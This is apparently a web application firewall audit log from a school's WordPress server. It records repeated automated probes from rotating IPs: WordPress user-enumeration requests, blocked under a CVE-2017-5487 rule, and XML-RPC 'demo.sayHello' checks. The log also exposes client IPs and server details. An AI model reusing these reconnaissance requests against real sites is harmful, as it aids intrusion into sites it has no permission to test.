[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304794117182 2984 (- - -) Stopwatch2: 1746304794117182 2984; combined=1310, p1=452, p2=827, p3=0, p4=0, p5=30, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03e9de04-Z-- --2db7d27c-A-- [04/May/2025:03:39:58 +0700] aBZ_HoOgvPi2IO4kz1sCZwAAAJM 103.236.140.4 51374 103.236.140.4 8181 --2db7d27c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.82.116 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.82.116 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --2db7d27c-C-- demo.sayHello --2db7d27c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --2db7d27c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304798326282 4875 (- - -) Stopwatch2: 1746304798326282 4875; combined=3866, p1=427, p2=3226, p3=30, p4=31, p5=89, sr=69, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2db7d27c-Z-- --4c100977-A-- [04/May/2025:03:41:04 +0700] aBZ_YIOgvPi2IO4kz1sCaAAAAI8 103.236.140.4 51388 103.236.140.4 8181 --4c100977-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4c100977-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4c100977-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304864604308 2993 (- - -) Stopwatch2: 1746304864604308 2993; combined=1318, p1=455, p2=832, p3=0, p4=0, p5=31, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4c100977-Z-- --20271657-A-- [04/May/2025:03:41:09 +0700] aBZ_ZcP0ZqGY3Jj2X92cuQAAABA 103.236.140.4 51396 103.236.140.4 8181 --20271657-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.213.198.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.213.198.174 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --20271657-C-- demo.sayHello --20271657-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --20271657-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304869302673 6559 (- - -) Stopwatch2: 1746304869302673 6559; combined=4638, p1=597, p2=3798, p3=36, p4=42, p5=97, sr=73, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --20271657-Z-- --90789715-A-- [04/May/2025:03:42:21 +0700] aBZ_rSleQJs6d7wanHHVJQAAANA 103.236.140.4 51404 103.236.140.4 8181 --90789715-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.48 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --90789715-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --90789715-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304941776358 2978 (- - -) Stopwatch2: 1746304941776358 2978; combined=1312, p1=446, p2=836, p3=0, p4=0, p5=30, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --90789715-Z-- --99a59613-A-- [04/May/2025:03:42:28 +0700] aBZ_tCleQJs6d7wanHHVJgAAAMQ 103.236.140.4 51408 103.236.140.4 8181 --99a59613-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.88.48 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.88.48 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --99a59613-C-- demo.sayHello --99a59613-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --99a59613-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304948930104 4349 (- - -) Stopwatch2: 1746304948930104 4349; combined=3245, p1=419, p2=2653, p3=22, p4=24, p5=75, sr=59, sw=52, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --99a59613-Z-- --4d542000-A-- [04/May/2025:03:42:35 +0700] aBZ_uyleQJs6d7wanHHVJwAAAM4 103.236.140.4 51412 103.236.140.4 8181 --4d542000-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --4d542000-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d542000-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304955801014 2611 (- - -) Stopwatch2: 1746304955801014 2611; combined=1188, p1=458, p2=703, p3=0, p4=0, p5=27, sr=156, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d542000-Z-- --9b36760f-A-- [04/May/2025:03:42:43 +0700] aBZ_w0SOhfQ6W15Bgg8SIwAAAEw 103.236.140.4 51416 103.236.140.4 8181 --9b36760f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.86.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.86.196 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --9b36760f-C-- demo.sayHello --9b36760f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --9b36760f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304963870096 6058 (- - -) Stopwatch2: 1746304963870096 6058; combined=4469, p1=601, p2=3642, p3=34, p4=36, p5=93, sr=79, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9b36760f-Z-- --97b66e01-A-- [04/May/2025:03:42:51 +0700] aBZ_y0SOhfQ6W15Bgg8SJQAAAEQ 103.236.140.4 51420 103.236.140.4 8181 --97b66e01-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --97b66e01-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --97b66e01-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746304971321996 2370 (- - -) Stopwatch2: 1746304971321996 2370; combined=1203, p1=410, p2=761, p3=0, p4=0, p5=32, sr=129, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --97b66e01-Z-- --71abf608-A-- [04/May/2025:03:42:55 +0700] aBZ_zyleQJs6d7wanHHVKQAAAMs 103.236.140.4 51424 103.236.140.4 8181 --71abf608-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.82.118 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.82.118 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --71abf608-C-- demo.sayHello --71abf608-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --71abf608-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746304975815350 5179 (- - -) Stopwatch2: 1746304975815350 5179; combined=3919, p1=458, p2=3257, p3=28, p4=28, p5=88, sr=68, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71abf608-Z-- --2ffbbc7e-A-- [04/May/2025:03:43:34 +0700] aBZ_9oOgvPi2IO4kz1sCagAAAJQ 103.236.140.4 51432 103.236.140.4 8181 --2ffbbc7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --2ffbbc7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ffbbc7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305014203781 2848 (- - -) Stopwatch2: 1746305014203781 2848; combined=1261, p1=463, p2=770, p3=0, p4=0, p5=28, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2ffbbc7e-Z-- --e315a864-A-- [04/May/2025:03:43:40 +0700] aBZ__MP0ZqGY3Jj2X92cvAAAABY 103.236.140.4 51436 103.236.140.4 8181 --e315a864-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.12.220 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.12.220 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e315a864-C-- demo.sayHello --e315a864-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e315a864-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305020974054 6204 (- - -) Stopwatch2: 1746305020974054 6204; combined=4568, p1=615, p2=3726, p3=33, p4=36, p5=93, sr=84, sw=65, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e315a864-Z-- --ec2b566e-A-- [04/May/2025:03:44:40 +0700] aBaAOCleQJs6d7wanHHVLQAAAMM 103.236.140.4 51442 103.236.140.4 8181 --ec2b566e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.108 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ec2b566e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ec2b566e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305080802866 2984 (- - -) Stopwatch2: 1746305080802866 2984; combined=1333, p1=482, p2=820, p3=0, p4=0, p5=31, sr=82, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ec2b566e-Z-- --8b9add0c-A-- [04/May/2025:03:44:47 +0700] aBaAPyleQJs6d7wanHHVLgAAANY 103.236.140.4 51446 103.236.140.4 8181 --8b9add0c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.0.108 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.0.108 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --8b9add0c-C-- demo.sayHello --8b9add0c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --8b9add0c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305087186352 5207 (- - -) Stopwatch2: 1746305087186352 5207; combined=3836, p1=487, p2=3133, p3=23, p4=26, p5=97, sr=78, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8b9add0c-Z-- --08cbc64e-A-- [04/May/2025:03:45:01 +0700] aBaATUSOhfQ6W15Bgg8SJgAAAEA 103.236.140.4 51450 103.236.140.4 8181 --08cbc64e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --08cbc64e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --08cbc64e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305101319127 2933 (- - -) Stopwatch2: 1746305101319127 2933; combined=1347, p1=485, p2=832, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --08cbc64e-Z-- --6eebf903-A-- [04/May/2025:03:45:05 +0700] aBaAUSleQJs6d7wanHHVLwAAANI 103.236.140.4 51454 103.236.140.4 8181 --6eebf903-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --6eebf903-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6eebf903-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746305105538519 2495 (- - -) Stopwatch2: 1746305105538519 2495; combined=1141, p1=360, p2=754, p3=0, p4=0, p5=27, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6eebf903-Z-- --01055212-A-- [04/May/2025:03:45:06 +0700] aBaAUoOgvPi2IO4kz1sCbwAAAIA 103.236.140.4 51456 103.236.140.4 8181 --01055212-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.177.237 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.177.237 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --01055212-C-- demo.sayHello --01055212-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --01055212-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746305106537109 5119 (- - -) Stopwatch2: 1746305106537109 5119; combined=3977, p1=482, p2=3286, p3=28, p4=31, p5=88, sr=70, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --01055212-Z-- --a8101b4e-A-- [04/May/2025:03:45:11 +0700] aBaAV0SOhfQ6W15Bgg8SKAAAAFc 103.236.140.4 51462 103.236.140.4 8181 --a8101b4e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.66 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.66 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8101b4e-C-- demo.sayHello 